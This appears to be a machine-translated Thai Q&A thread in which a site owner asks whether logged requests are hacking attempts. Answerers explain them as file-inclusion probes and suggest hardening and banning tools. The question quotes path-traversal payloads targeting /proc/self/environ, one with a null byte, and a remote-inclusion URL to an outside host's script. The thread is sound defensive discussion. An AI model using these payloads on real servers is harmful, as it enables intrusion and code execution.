นี่เป็นความพยายามในการแฮ็กหรือไม่

เมื่อดูบันทึก 404 รายการของฉันฉันสังเกตเห็น URL สองรายการต่อไปนี้ซึ่งทั้งคู่เกิดขึ้นครั้งเดียว:

/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ

และ

/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00

หน้าคำถามlibrary.phpต้องใช้typeตัวแปรที่มีค่าที่ยอมรับได้แตกต่างกันครึ่งโหลแล้วจึงเป็นidตัวแปร ดังนั้น URL ที่ถูกต้องอาจเป็น

library.php?type=Circle-K&id=Strange-Things-Are-Afoot

และรหัสทั้งหมดจะถูกเรียกใช้mysql_real_escape_stringก่อนที่จะถูกใช้เพื่อสอบถามฐานข้อมูล

ฉันเป็นมือใหม่ แต่สำหรับฉันแล้วดูเหมือนว่าลิงก์ทั้งสองนี้เป็นการโจมตีแบบง่าย ๆ กับ webroot?

1)วิธีที่ดีที่สุดในการป้องกันสิ่งต่าง ๆ เหล่านี้นอกเหนือจาก 404

2)ฉันควรอนุญาต IP ที่รับผิดชอบหรือไม่

แก้ไข:เพิ่งสังเกตเห็นสิ่งนี้

/library.php=http://www.basfalt.no/scripts/danger.txt

แก้ไข 2: IP ที่ละเมิดสำหรับการโจมตีทั้ง 3 ครั้งนั้น216.97.231.15มีร่องรอยของ ISP ที่เรียกว่า Lunar Pages ซึ่งอยู่นอกลอสแองเจลิส

แก้ไข 3:ฉันตัดสินใจโทร ISP ตามเวลาท้องถิ่นในเช้าวันศุกร์และหารือเกี่ยวกับปัญหากับใครก็ตามที่ฉันสามารถโทรศัพท์ได้ ฉันจะโพสต์ผลลัพธ์ที่นี่ภายใน 24 ชั่วโมงหรือมากกว่านั้น

แก้ไข 4:ฉันสิ้นสุดการส่งอีเมลผู้ดูแลระบบของพวกเขาและพวกเขาตอบก่อนว่า "พวกเขากำลังมองหามัน" และจากนั้นอีกหนึ่งวันต่อมากับ "ปัญหานี้ควรได้รับการแก้ไขในขณะนี้" ไม่มีรายละเอียดเพิ่มเติมเศร้า

0) ใช่ อย่างน้อยที่สุดมันเป็นเครื่องมือตรวจสอบอย่างเป็นระบบกับเว็บไซต์ของคุณที่พยายามค้นหาว่ามีความเสี่ยงหรือไม่

1) นอกเหนือจากการทำให้แน่ใจว่าโค้ดของคุณสะอาดไม่มีอะไรมากมายที่คุณสามารถทำได้ แต่ทำการทดสอบของคุณเองกับโฮสต์ของคุณเพื่อให้แน่ใจว่าปลอดภัย Google Skipfish เป็นหนึ่งในเครื่องมือมากมายที่ช่วยคุณได้

2) ฉันจะ

นี้คือการโจมตีก็จะมีการอธิบายอย่างมากที่นี่

อย่างที่คนอื่นพูดว่า: ใช่มันเป็นความพยายามในการแฮ็ค โปรดทราบว่านอกเหนือจากความพยายามที่ทำด้วยมือนี้แล้วยังมีระบบอัตโนมัติจำนวนมากที่ทำงานโดย botnets โดยทั่วไปการโจมตีประเภทนั้นกำลังพยายามที่จะแอบดูผ่านช่องโหว่ที่มีอายุเก่าแก่และ / หรือข้อบกพร่องการเข้ารหัสทั่วไปเช่นความล้มเหลวในการตรวจสอบการป้อนข้อมูลของผู้ใช้ที่นำไปสู่การฉีด SQL ระบบหรือการรั่วไหลของไฟล์

การห้ามบ็อตเน็ตด้วยมือนั้นเป็นไปไม่ได้มากที่สุดเนื่องจากบอตเน็ตสามารถใช้ที่อยู่ IP ที่ไม่ซ้ำกันได้หลายพันรายการดังนั้นหากคุณต้องการแบนพวกเขาคุณจะต้องใช้โปรแกรมแบนอัตโนมัติบางประเภท fail2banอยู่ในใจของฉัน; ทำให้มันตอบสนองต่อเหตุการณ์ mod_security หรือรายการบันทึกอื่น ๆ

หากรหัสของคุณสะอาดและเซิร์ฟเวอร์แข็งตัวความพยายามในการแฮ็กนั้นเป็นเพียงมลพิษจากบันทึกที่น่ารำคาญ แต่จะเป็นการดีกว่าถ้าคุณทำตามขั้นตอนข้อควรระวังและพิจารณาสิ่งต่อไปนี้บางส่วนหรือทั้งหมดขึ้นอยู่กับความต้องการของคุณ:

• mod_securityเป็นโมดูล Apache ที่กรองการพยายามแฮ็คทั่วไปทุกชนิด นอกจากนี้ยังสามารถ จำกัด ทราฟฟิกขาออก (หน้าเซิร์ฟเวอร์ของคุณจะส่งไปยังไคลเอนต์) หากเห็น JavaScript ที่น่าสงสัยเป็นต้น

• Suhosinสำหรับการเสริม PHP ด้วยตัวเอง

• รันสคริปต์ PHP ของคุณในฐานะผู้ใช้ที่เป็นเจ้าของสคริปต์ สิ่งต่างๆเช่นsuphpและphp-fpmทำให้เป็นไปได้

• ติด Webroot และไดเรกทอรีชั่วคราว PHP ของคุณเป็นnoexec, nosuid, nodev

• ฟังก์ชั่นที่ไม่จำเป็น PHP ปิดการใช้งานเช่นระบบและpassthru

• ปิดใช้งานโมดูล PHP ที่ไม่จำเป็น ตัวอย่างเช่นหากคุณไม่ต้องการการสนับสนุน IMAP อย่าเปิดใช้งาน

• ทำให้เซิร์ฟเวอร์ของคุณทันสมัย

• จับตาดูท่อนซุง

• ตรวจสอบให้แน่ใจว่าคุณมีข้อมูลสำรอง

• วางแผนว่าจะทำอย่างไรถ้ามีคนแฮ็คคุณหรือภัยพิบัติอื่น ๆ เข้ามาโจมตีคุณ

เป็นการเริ่มต้นที่ดี จากนั้นก็มีมาตรการที่รุนแรงยิ่งขึ้นเช่นSnortและPreludeแต่พวกมันสามารถ overkill มากสำหรับการตั้งค่าส่วนใหญ่

เป็นไปได้มากว่าเครื่องจักรที่สร้างข้อความค้นหาเหล่านั้นเป็นซอมบี้บ็อตเน็ต หากคุณได้รับคำขอเหล่านั้นจาก IP หลายรายการอาจไม่คุ้มค่าที่จะห้ามพวกเขาเพราะคุณจะต้องแบนอินเทอร์เน็ตไปครึ่งหนึ่งเพื่อให้มีประสิทธิภาพ

ดังที่ได้กล่าวไปแล้ว - เป็นความพยายามในการ acces ไฟล์ / proc / self / environ เพื่อรับข้อมูลเพิ่มเติม

ฉันคิดว่ามันเป็นเครื่อง linux:

คุณควรใช้

• suhosin ( http://www.hardened-php.net/suhosin/ ) - ปกป้องสคริปต์ php
• ใช้ข้อ จำกัด openbasedir PHP
• fail2ban http://www.fail2ban.org/

คุณสามารถบล็อกไอพีของเซิร์ฟเวอร์ที่ถูกโจมตีได้ แต่คุณควรพิจารณาว่ามันไม่สามารถโจมตีได้ในฟีเจอร์

ฉันเคยบล็อกบริการบางอย่างเมื่อเซิร์ฟเวอร์ของฉันถูกโจมตี: http / https / pop / imap / ssh แต่เปิด smtp ไว้ซึ่งคุณจะได้รับการแจ้งเตือนหากคุณทำผิดพลาด

ใช่มันเป็นความพยายามในการบุกรุก คุณควรห้ามแบนไอพีอย่างแน่นอน หากคุณพิจารณาว่า IP อยู่นอกประเทศคุณอาจต้องการห้ามเครือข่ายย่อยทั้งหมดที่อยู่ในนั้น นี่เป็นปัญหารหัสน้อยกว่ามันเป็นปัญหาเซิร์ฟเวอร์ ดูการบุกรุกนี้โดยเฉพาะและตรวจสอบให้แน่ใจว่าผู้ให้บริการโฮสติ้งของคุณไม่เสี่ยงกับมันหรือความพยายามแบบตัวเล็ก ๆ ของสคริปต์ที่คล้ายกัน

นี่เป็นความพยายามที่จะใช้ช่องโหว่การรวมไฟล์ในเครื่องโดยพลการในสคริปต์ฝั่งเซิร์ฟเวอร์ที่สามารถเข้าถึงได้ผ่านเว็บเซิร์ฟเวอร์ของคุณ ในระบบที่มีช่องโหว่ของ linux /proc/self/environสามารถถูกใช้ในการสั่งรันโค้ดฝั่งเซิร์ฟเวอร์โดยพลการ

ตามคำแนะนำของ Janne Pikkarainen:

จับตาดูท่อนซุง

ตรวจสอบให้แน่ใจว่าคุณมีข้อมูลสำรอง

เป็นส่วนหนึ่งของบันทึกเหล่านี้เป็นสิ่งสำคัญในการตรวจสอบการเปลี่ยนแปลงของไฟล์ใด ๆ ของคุณรวมถึงเว็บไซต์ของคุณเป็นส่วนหนึ่งของระบบตรวจจับการบุกรุก ตัวอย่างคือ OpenBSD ที่ทำสิ่งนี้เป็นค่าเริ่มต้นสำหรับไฟล์ปรับแต่ง ฉันนำสิ่งนี้มาเพราะ:

• สำหรับ Cloud Sites นั้นมีการแก้ไขไฟล์ PHP บนเว็บไซต์ที่สร้างขึ้นเองเล็กน้อย (นี่เป็นเพียงการแสดงผลแท็กที่ไม่ได้มาตรฐาน แต่อาจเป็นส่วนหนึ่งของการทดสอบเพื่อวัดขนาดของการใช้ประโยชน์)
• สำหรับผู้ร่วมงานรายหนึ่งมีการเปลี่ยนเส้นทางที่ละเอียดอ่อนภายในไฟล์. htaccess WordPress (เฉพาะผู้อ้างอิงจากผลการค้นหาของ Google)
• สำหรับผู้ร่วมงานรายอื่นมีการแก้ไขไฟล์ Joomla config ของพวกเขาเล็กน้อย (จำไม่ได้ว่าอะไรฉันคิดว่ามันเป็นการเปลี่ยนเส้นทางภายใต้เงื่อนไขบางอย่างเช่นกัน)